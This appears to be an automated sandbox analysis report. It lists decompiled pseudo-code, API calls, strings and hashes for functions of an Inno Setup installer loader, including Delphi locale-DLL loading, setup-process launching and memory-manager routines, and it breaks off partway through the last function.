cryptbase.dll, xrefs: 0041123B
setupapi.dll, xrefs: 004111CF
kernel32.dll, xrefs: 004110F2
propsys.dll, xrefs: 00411205

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorHandleLibraryLoadModeModulePolicyProcessVersion
String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$kernel32.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
API String ID: 2248137261-2388063882
Opcode ID: bcd86be6ede9f35533a8287881bcd1aec4990898a94ccdcf4b7cd9b6f9992ccf
Instruction ID: 5ba2602b3ae426752e8bc3b72944c024d579907c793108ba05fbf413d09d3323
Opcode Fuzzy Hash: bcd86be6ede9f35533a8287881bcd1aec4990898a94ccdcf4b7cd9b6f9992ccf
Instruction Fuzzy Hash: F051AE706105089BD704FBA5D8829EE73B6EF85304B60C13BEA11B76E5CB3CAD458B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00405DE8, Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 207
registrystringlibraryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00405DE8(WCHAR* __eax) {
				WCHAR* _v8;
				void* _v12;
				short _v18;
				short _v22;
				short _v32;
				int _v36;
				short _v558;
				long _t48;
				signed int _t58;
				long _t67;
				long _t69;
				long _t71;
				WCHAR* _t82;
				struct HINSTANCE__* _t89;
				struct HINSTANCE__* _t96;
				short* _t108;
				WCHAR* _t109;
				intOrPtr _t113;
				signed int _t115;
				signed int _t116;
				signed int _t118;
				signed int _t119;
				signed int _t121;
				signed int _t122;
				struct HINSTANCE__* _t124;
				void* _t127;
				void* _t129;
				intOrPtr _t130;
				long _t137;

				_t127 = _t129;
				_t130 = _t129 + 0xfffffdd4;
				_v8 = __eax;
				GetModuleFileNameW(0,  &_v558, 0x105);
				_v32 = 0;
				_t48 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t48 == 0) {
					L4:
					_push(_t127);
					_push(0x405f1c);
					_push( *[fs:eax]);
					 *[fs:eax] = _t130;
					_v36 = 0xa;
					E00405BEC( &_v558, 0x105);
					if(RegQueryValueExW(_v12,  &_v558, 0, 0,  &_v32,  &_v36) != 0) {
						_t137 = RegQueryValueExW(_v12, E00406110, 0, 0,  &_v32,  &_v36);
						if(_t137 != 0) {
							_v32 = 0;
						}
					}
					_t58 = _v36 >> 1;
					if(_t137 < 0) {
						asm("adc eax, 0x0");
					}
					 *((short*)(_t127 + _t58 * 2 - 0x1c)) = 0;
					_pop(_t113);
					 *[fs:eax] = _t113;
					_push(E00405F23);
					return RegCloseKey(_v12);
				} else {
					_t67 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t67 == 0) {
						goto L4;
					} else {
						_t69 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t69 == 0) {
							goto L4;
						} else {
							_t71 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
							if(_t71 != 0) {
								lstrcpynW( &_v558, _v8, 0x105);
								GetLocaleInfoW(GetThreadLocale(), 3,  &_v22, 5); // executed
								_t124 = 0;
								if(_v558 != 0 && (_v22 != 0 || _v32 != 0)) {
									_t108 = lstrlenW( &_v558) + _t80 +  &_v558;
									L16:
									if( *_t108 != 0x2e && _t108 !=  &_v558) {
										_t108 = _t108 - 2;
										goto L16;
									}
									_t82 =  &_v558;
									if(_t108 != _t82) {
										_t109 = _t108 + 2;
										if(_v32 != 0) {
											_t121 = _t109 - _t82;
											_t122 = _t121 >> 1;
											if(_t121 < 0) {
												asm("adc edx, 0x0");
											}
											lstrcpynW(_t109,  &_v32, 0x105 - _t122);
											_t124 = LoadLibraryExW( &_v558, 0, 2);
										}
										if(_t124 == 0 && _v22 != 0) {
											_t115 = _t109 -  &_v558;
											_t116 = _t115 >> 1;
											if(_t115 < 0) {
												asm("adc edx, 0x0");
											}
											lstrcpynW(_t109,  &_v22, 0x105 - _t116);
											_t89 = LoadLibraryExW( &_v558, 0, 2); // executed
											_t124 = _t89;
											if(_t124 == 0) {
												_v18 = 0;
												_t118 = _t109 -  &_v558;
												_t119 = _t118 >> 1;
												if(_t118 < 0) {
													asm("adc edx, 0x0");
												}
												lstrcpynW(_t109,  &_v22, 0x105 - _t119);
												_t96 = LoadLibraryExW( &_v558, 0, 2); // executed
												_t124 = _t96;
											}
										}
									}
								}
								return _t124;
							} else {
								goto L4;
							}
						}
					}
				}
			}

0x00405de9
0x00405deb
0x00405df3
0x00405e04
0x00405e09
0x00405e24
0x00405e2b
0x00405e8b
0x00405e8d
0x00405e8e
0x00405e93
0x00405e96
0x00405e99
0x00405eab
0x00405ece
0x00405eea
0x00405eec
0x00405eee
0x00405eee
0x00405eec
0x00405ef7
0x00405ef9
0x00405efb
0x00405efb
0x00405efe
0x00405f07
0x00405f0a
0x00405f0d
0x00405f1b
0x00405e2d
0x00405e42
0x00405e49
0x00000000
0x00405e4b
0x00405e60
0x00405e67
0x00000000
0x00405e69
0x00405e7e
0x00405e85
0x00405f33
0x00405f46
0x00405f4b
0x00405f55
0x00405f83
0x00405f8a
0x00405f8e
0x00405f87
0x00000000
0x00405f87
0x00405f9a
0x00405fa2
0x00405fa8
0x00405fb0
0x00405fb4
0x00405fb6
0x00405fb8
0x00405fba
0x00405fba
0x00405fca
0x00405fdf
0x00405fdf
0x00405fe3
0x00405ff4
0x00405ff6
0x00405ff8
0x00405ffa
0x00405ffa
0x0040600a
0x0040601a
0x0040601f
0x00406023
0x00406025
0x00406033
0x00406035
0x00406037
0x00406039
0x00406039
0x00406049
0x00406059
0x0040605e
0x0040605e
0x00406023
0x00405fe3
0x00405fa2
0x00406067
0x00000000
0x00000000
0x00000000
0x00405e85
0x00405e67
0x00405e49

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,?,00000000), ref: 00405E04
RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 00405E24
RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 00405E42
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 00405E60
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 00405E7E
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405F1C,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 00405EC7
RegQueryValueExW.ADVAPI32(?,00406110,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405F1C,?,80000001), ref: 00405EE5
RegCloseKey.ADVAPI32(?,00405F23,00000000,?,?,00000000,00405F1C,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405F16
lstrcpynW.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000), ref: 00405F33
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405F40
GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405F46
lstrlenW.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405F74
lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405FCA
LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405FDA
lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0040600A
LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0040601A
lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00406049

Strings

Software\CodeGear\Locales, xrefs: 00405E1A, 00405E38
Software\Borland\Delphi\Locales, xrefs: 00405E74
Software\Borland\Locales, xrefs: 00405E56

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Openlstrcpyn$LibraryLoadLocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
API String ID: 3838733197-345420546
Opcode ID: ed19aa05aec1765680b8a5727bfaec113ff10cf714bcfc3f630a7a3f4138bf86
Instruction ID: 5f6b4038d93197cc4a444e8185523a96e657e7a92dffb1bb2a9d05fafe77d5e4
Opcode Fuzzy Hash: ed19aa05aec1765680b8a5727bfaec113ff10cf714bcfc3f630a7a3f4138bf86
Instruction Fuzzy Hash: 30615671A406197AEB21DAA5CC46FEF72BCDB0C744F404076BA01FA5C1E6BC9E448B99

Uniqueness

Uniqueness Score: -1.00%

Function 00405F23, Relevance: 15.1, APIs: 10, Instructions: 108
stringlibrarythreadCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00405F23() {
				void* _t32;
				struct HINSTANCE__* _t39;
				struct HINSTANCE__* _t46;
				short* _t57;
				WCHAR* _t58;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t66;
				signed int _t67;
				struct HINSTANCE__* _t68;
				void* _t70;

				lstrcpynW(_t70 - 0x22a,  *(_t70 - 4), 0x105);
				GetLocaleInfoW(GetThreadLocale(), 3, _t70 - 0x12, 5); // executed
				_t68 = 0;
				if( *(_t70 - 0x22a) == 0 ||  *(_t70 - 0x12) == 0 &&  *(_t70 - 0x1c) == 0) {
					L20:
					return _t68;
				} else {
					_t57 = lstrlenW(_t70 - 0x22a) + _t30 + _t70 - 0x22a;
					L5:
					if( *_t57 != 0x2e && _t57 != _t70 - 0x22a) {
						_t57 = _t57 - 2;
						goto L5;
					}
					_t32 = _t70 - 0x22a;
					if(_t57 != _t32) {
						_t58 = _t57 + 2;
						if( *(_t70 - 0x1c) != 0) {
							_t66 = _t58 - _t32;
							_t67 = _t66 >> 1;
							if(_t66 < 0) {
								asm("adc edx, 0x0");
							}
							lstrcpynW(_t58, _t70 - 0x1c, 0x105 - _t67);
							_t68 = LoadLibraryExW(_t70 - 0x22a, 0, 2);
						}
						if(_t68 == 0 &&  *(_t70 - 0x12) != 0) {
							_t60 = _t58 - _t70 - 0x22a;
							_t61 = _t60 >> 1;
							if(_t60 < 0) {
								asm("adc edx, 0x0");
							}
							lstrcpynW(_t58, _t70 - 0x12, 0x105 - _t61);
							_t39 = LoadLibraryExW(_t70 - 0x22a, 0, 2); // executed
							_t68 = _t39;
							if(_t68 == 0) {
								 *((short*)(_t70 - 0xe)) = 0;
								_t63 = _t58 - _t70 - 0x22a;
								_t64 = _t63 >> 1;
								if(_t63 < 0) {
									asm("adc edx, 0x0");
								}
								lstrcpynW(_t58, _t70 - 0x12, 0x105 - _t64);
								_t46 = LoadLibraryExW(_t70 - 0x22a, 0, 2); // executed
								_t68 = _t46;
							}
						}
					}
					goto L20;
				}
			}

0x00405f33
0x00405f46
0x00405f4b
0x00405f55
0x00406060
0x00406067
0x00405f6d
0x00405f83
0x00405f8a
0x00405f8e
0x00405f87
0x00000000
0x00405f87
0x00405f9a
0x00405fa2
0x00405fa8
0x00405fb0
0x00405fb4
0x00405fb6
0x00405fb8
0x00405fba
0x00405fba
0x00405fca
0x00405fdf
0x00405fdf
0x00405fe3
0x00405ff4
0x00405ff6
0x00405ff8
0x00405ffa
0x00405ffa
0x0040600a
0x0040601a
0x0040601f
0x00406023
0x00406025
0x00406033
0x00406035
0x00406037
0x00406039
0x00406039
0x00406049
0x00406059
0x0040605e
0x0040605e
0x00406023
0x00405fe3
0x00000000
0x00405fa2

APIs

lstrcpynW.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000), ref: 00405F33
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405F40
GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405F46
lstrlenW.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405F74
lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405FCA
LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405FDA
lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0040600A
LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0040601A
lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00406049
LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?), ref: 00406059

Strings

Software\CodeGear\Locales, xrefs: 00405E1A, 00405E38
Software\Borland\Delphi\Locales, xrefs: 00405E74
Software\Borland\Locales, xrefs: 00405E56

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
API String ID: 1599918012-345420546
Opcode ID: f347cc9f3c477e58c1cd365ffa1779204afb21583e55c99ec7d7252987469007
Instruction ID: 4452d95ce859696c23b6bd0f50a078a4c31ee5800544849d8d1c420259f7e676
Opcode Fuzzy Hash: f347cc9f3c477e58c1cd365ffa1779204afb21583e55c99ec7d7252987469007
Instruction Fuzzy Hash: D3318232E402196BDB21DAA5CC49BEB62BC9B0C344F444076B601F72C4F6BC9E448B99

Uniqueness

Uniqueness Score: -1.00%

Function 00406458, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406458() {
				intOrPtr _v16;
				struct _SYSTEM_INFO* _t3;

				GetSystemInfo(_t3); // executed
				return _v16;
			}

0x0040645c
0x00406468

APIs

GetSystemInfo.KERNEL32 ref: 0040645C

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 9ce24fec29c07a0e080f9dc895799ad5acc0e028318248ff73c69df84a526f2f
Instruction ID: 0cc09a7703e4d468e824d7ecf1c2981a2773579081892800ab72b071deb089ba
Opcode Fuzzy Hash: 9ce24fec29c07a0e080f9dc895799ad5acc0e028318248ff73c69df84a526f2f
Instruction Fuzzy Hash: C4A012204084010AC508A7194C8380F31841945614FC80324745CB93D2E619856403DB

Uniqueness

Uniqueness Score: -1.00%

Function 00411C96, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00411C96(long __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t19;
				intOrPtr _t21;
				struct HWND__* _t23;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t28;
				intOrPtr _t30;
				intOrPtr _t38;
				intOrPtr _t41;
				int _t42;
				intOrPtr _t43;
				intOrPtr _t45;
				struct HWND__* _t48;
				intOrPtr _t49;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t61;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				void* _t74;
				void* _t75;

				_t75 = __eflags;
				_t55 = __ecx;
				0x1840();
				SetLastError(__eax);
				E0040E770(0x69, __ebx, _t55, __esi, _t75);
				E0040404C();
				_t19 =  *0x41865c; // 0x0
				 *0x41865c = 0;
				E00403894(_t19);
				_t21 =  *0x415b48; // 0x400000
				_t23 = E004068EC(0, L"STATIC", 0, _t21, 0, 0, 0, 0, 0, 0, 0); // executed
				 *0x412af0 = _t23;
				_t24 =  *0x412af0; // 0xc025e
				 *0x418654 = SetWindowLongW(_t24, 0xfffffffc, E0040EAC4);
				_t27 =  *0x412af0; // 0xc025e
				 *(_t74 - 0x58) = _t27;
				 *((char*)(_t74 - 0x54)) = 0;
				_t28 =  *0x418664; // 0x4264f0
				_t4 = _t28 + 0x20; // 0x619dc9
				 *((intOrPtr*)(_t74 - 0x50)) =  *_t4;
				 *((char*)(_t74 - 0x4c)) = 0;
				_t30 =  *0x418664; // 0x4264f0
				_t7 = _t30 + 0x24; // 0x1da00
				 *((intOrPtr*)(_t74 - 0x48)) =  *_t7;
				 *((char*)(_t74 - 0x44)) = 0;
				E004082D4(L"/SL5=\"$%x,%d,%d,", 2, _t74 - 0x58, _t74 - 0x40);
				_push( *((intOrPtr*)(_t74 - 0x40)));
				_push( *0x418658);
				_push(0x411f5c);
				E0040B84C(_t74 - 0x5c, __ebx, __esi, _t75);
				_push( *((intOrPtr*)(_t74 - 0x5c)));
				E0040513C(_t74 - 0x3c, 4, __edi);
				_t38 =  *0x418670; // 0x0, executed
				E0040EB50(_t38, __ebx, 0x412aec,  *((intOrPtr*)(_t74 - 0x3c)), __edi, __esi, __fp0); // executed
				if( *0x412ae8 != 0xffffffff) {
					_t52 =  *0x412ae8; // 0x0
					E0040EA2C(_t52, 0x412aec);
				}
				_pop(_t69);
				 *[fs:eax] = _t69;
				_push(E00411E30);
				_t41 =  *0x41865c; // 0x0
				_t42 = E00403894(_t41);
				if( *0x418670 != 0) {
					_t71 =  *0x418670; // 0x0
					_t42 = E0040E5DC(0, _t71, 0xfa, 0x32); // executed
				}
				if( *0x418668 != 0) {
					_t49 =  *0x418668; // 0x0
					_t42 = RemoveDirectoryW(E00404D24(_t49)); // executed
				}
				if( *0x412af0 != 0) {
					_t48 =  *0x412af0; // 0xc025e
					_t42 = DestroyWindow(_t48); // executed
				}
				if( *0x41864c != 0) {
					_t43 =  *0x41864c; // 0x0
					_t61 =  *0x418650; // 0x10
					_t70 =  *0x40dcc4; // 0x40dcc8
					E00405548(_t43, _t61, _t70);
					_t45 =  *0x41864c; // 0x0
					E00402E20(_t45);
					 *0x41864c = 0;
					return 0;
				}
				return _t42;
			}

0x00411c96
0x00411c96
0x00411c96
0x00411c9e
0x00411ca5
0x00411caa
0x00411caf
0x00411cb6
0x00411cbc
0x00411ccf
0x00411ce3
0x00411ce8
0x00411cf4
0x00411cff
0x00411d08
0x00411d0d
0x00411d10
0x00411d14
0x00411d19
0x00411d1c
0x00411d1f
0x00411d23
0x00411d28
0x00411d2b
0x00411d2e
0x00411d3f
0x00411d44
0x00411d47
0x00411d4d
0x00411d55
0x00411d5a
0x00411d65
0x00411d72
0x00411d77
0x00411d83
0x00411d85
0x00411d8a
0x00411d8a
0x00411d91
0x00411d94
0x00411d97
0x00411d9c
0x00411da1
0x00411dad
0x00411dbb
0x00411dc3
0x00411dc3
0x00411dcf
0x00411dd1
0x00411ddc
0x00411ddc
0x00411de8
0x00411dea
0x00411df0
0x00411df0
0x00411dfc
0x00411dfe
0x00411e03
0x00411e09
0x00411e0f
0x00411e14
0x00411e19
0x00411e20
0x00000000
0x00411e20
0x00411e25

APIs

SetLastError.KERNEL32(00000000), ref: 00411C9E

Part of subcall function 0040E770: GetLastError.KERNEL32(00000000,0040E817,?,?,00000000), ref: 0040E793

Part of subcall function 004068EC: CreateWindowExW.USER32 ref: 0040692B

SetWindowLongW.USER32 ref: 00411CFA

Part of subcall function 0040B84C: GetCommandLineW.KERNEL32(00000000,0040B88E,?,?,00000000,?,00411D5A,00411F5C,?), ref: 0040B862

Part of subcall function 0040EB50: CreateProcessW.KERNEL32 ref: 0040EBC0
Part of subcall function 0040EB50: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,0040EC50,00000000,0040EC40,00000000), ref: 0040EBD4
Part of subcall function 0040EB50: MsgWaitForMultipleObjects.USER32 ref: 0040EBED
Part of subcall function 0040EB50: GetExitCodeProcess.KERNEL32 ref: 0040EC01
Part of subcall function 0040EB50: CloseHandle.KERNEL32(?,?,00412AEC,00000001,?,00000000,000000FF,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040EC0A

RemoveDirectoryW.KERNEL32(00000000,00411E30,?,?,?,?,?,?,?,?,?,?,000C025E,000000FC,0040EAC4,00000000), ref: 00411DDC
DestroyWindow.USER32(000C025E,00411E30,?,?,?,?,?,?,?,?,?,?,000C025E,000000FC,0040EAC4,00000000), ref: 00411DF0

Strings

InnoSetupLdrWindow, xrefs: 00411CD7
/SL5="$%x,%d,%d,, xrefs: 00411D3A
STATIC, xrefs: 00411CDC

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CloseCreateErrorHandleLastProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 2016261911-3001827809
Opcode ID: 3d5eb3ba2af2cb31e641145fdf4efdddbec66f7e0ffecaf89dfd04d9d16d1a38
Instruction ID: b533c9448902221149ce9476a49e0a73e805eb15627331010c16b366fa4b9f1f
Opcode Fuzzy Hash: 3d5eb3ba2af2cb31e641145fdf4efdddbec66f7e0ffecaf89dfd04d9d16d1a38
Instruction Fuzzy Hash: B6411570A402409FDB10EBA9ED45BDE77E5AB48308F10C53EE601AB2F5DB789852CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401C7C, Relevance: 12.2, APIs: 8, Instructions: 221
sleepCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00401C7C(void* __eax, signed int __edi, void* __ebp) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				signed int __ebx;
				void* _t58;
				signed int _t61;
				int _t65;
				signed int _t67;
				void _t70;
				int _t71;
				signed int _t78;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t96;
				signed int _t99;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t108;
				signed int _t113;
				void* _t115;
				void* _t116;

				_t56 = __eax;
				_t89 =  *(__eax - 4);
				_t78 =  *0x41304d; // 0x0
				if((_t89 & 0x00000007) != 0) {
					__eflags = _t89 & 0x00000005;
					if((_t89 & 0x00000005) != 0) {
						_pop(_t78);
						__eflags = _t89 & 0x00000003;
						if((_t89 & 0x00000003) == 0) {
							_push(_t78);
							_push(__edi);
							_t116 = _t115 + 0xffffffdc;
							_t103 = __eax - 0x10;
							E0040165C();
							_t58 = _t103;
							 *_t116 =  *_t58;
							_v48 =  *((intOrPtr*)(_t58 + 4));
							_t92 =  *(_t58 + 0xc);
							if((_t92 & 0x00000008) != 0) {
								_t79 = _t103;
								_t113 = _t92 & 0xfffffff0;
								_t99 = 0;
								__eflags = 0;
								while(1) {
									VirtualQuery(_t79,  &_v44, 0x1c);
									_t61 = VirtualFree(_t79, 0, 0x8000);
									__eflags = _t61;
									if(_t61 == 0) {
										_t99 = _t99 | 0xffffffff;
										goto L10;
									}
									_t104 = _v44.RegionSize;
									__eflags = _t113 - _t104;
									if(_t113 > _t104) {
										_t113 = _t113 - _t104;
										_t79 = _t79 + _t104;
										continue;
									}
									goto L10;
								}
							} else {
								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
								if(_t65 == 0) {
									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								 *_v48 =  *_t116;
								 *( *_t116 + 4) = _v48;
							}
							 *0x415ac4 = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags =  *0x4138d5;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0xc;
					 *_t14 =  *(__edx + 0xc) - 1;
					__eflags =  *_t14;
					__eax =  *(__edx + 8);
					if( *_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							 *(__ebx + 0xc) = __eax;
						} else {
							__eax =  *(__edx + 0x14);
							__ecx =  *(__edx + 4);
							 *(__eax + 4) = __ecx;
							 *(__ecx + 0x14) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x10)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x10)) == __edx) {
								goto L20;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x41304d; // 0x0
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x413a34], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags =  *0x4138d5;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x413a34], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
